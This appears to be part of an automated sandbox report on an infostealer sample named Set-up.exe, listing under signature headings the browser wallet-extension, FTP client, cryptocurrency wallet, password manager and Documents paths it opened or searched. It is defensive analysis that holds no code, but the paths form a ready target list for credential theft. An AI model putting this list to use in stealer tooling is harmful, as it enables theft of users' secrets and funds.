Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fiikommddbeccaoicoejoniammnalkfa	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oiaanamcepbccmdfckijjolhlkfocbgj	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flhbololhdbnkpnnocoifnopcapiekdi	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\UltraFXP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Notepadu002Bu002B\plugins\config\NppFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Estsoft\ALFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\FTP Now	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Notepadu002Bu002B\plugins\config\NppFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\FTPBox	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Estsoft\ALFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Estsoft\ALFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\FTPBox	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\FTPBox	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Notepadu002Bu002B\plugins\config\NppFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Local\INSoftware\NovaFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Estsoft\ALFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\FTP Now	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Notepadu002Bu002B\plugins\config\NppFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Local\INSoftware\NovaFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\BlazeFtp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\GHISLER	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\BitKinex	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\GHISLER	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Program Files (x86)\GoFTP\settings	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Local\INSoftware\NovaFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\FTP Now	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Notepadu002Bu002B\plugins\config\NppFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\BitKinex	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\BlazeFtp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\UltraFXP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\UltraFXP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\GHISLER	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\FTP Now	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\BlazeFtp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\UltraFXP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\BlazeFtp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\FTP Now	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\BitKinex	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\BitKinex	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\FTPBox	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\FTPBox	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\BitKinex	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\GHISLER	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Program Files (x86)\DeluxeFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Local\INSoftware\NovaFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\UltraFXP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\BlazeFtp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\GHISLER	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\WalletWasabi\Client\Wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\WalletWasabi\Client\Wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\WalletWasabi\Client\Wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\WalletWasabi\Client\Wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\WalletWasabi\Client\Wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Armory	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Armory	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Armory	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Armory	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Armory	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\DashCore\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\DashCore\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\DashCore\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\DashCore\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\DashCore\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Exodus	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Exodus	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Exodus	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Exodus	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Exodus	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\BBQCoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\BBQCoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\BBQCoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\BBQCoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\BBQCoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Megacoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Megacoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Megacoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Megacoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Megacoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mincoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Mincoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Mincoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Mincoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Mincoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Namecoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Namecoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Namecoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Namecoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Namecoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Primecoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Primecoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Primecoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Primecoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Primecoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Terracoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Terracoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Terracoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Terracoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Terracoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Daedalus Mainnet\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Daedalus Mainnet\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Daedalus Mainnet\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Daedalus Mainnet\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Daedalus Mainnet\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Ledger Live	Jump to behavior

Tries to steal from password manager

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Local\1Password\data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Local\1Password\data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\NordPass	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Bitwarden	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Bitwarden	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Bitwarden	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\NordPass	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Local\1Password\data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Bitwarden	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Bitwarden	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\NordPass	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\NordPass	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\NordPass	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Local\1Password\data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\1Password\data	Jump to behavior

Searches for user specific document files

Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
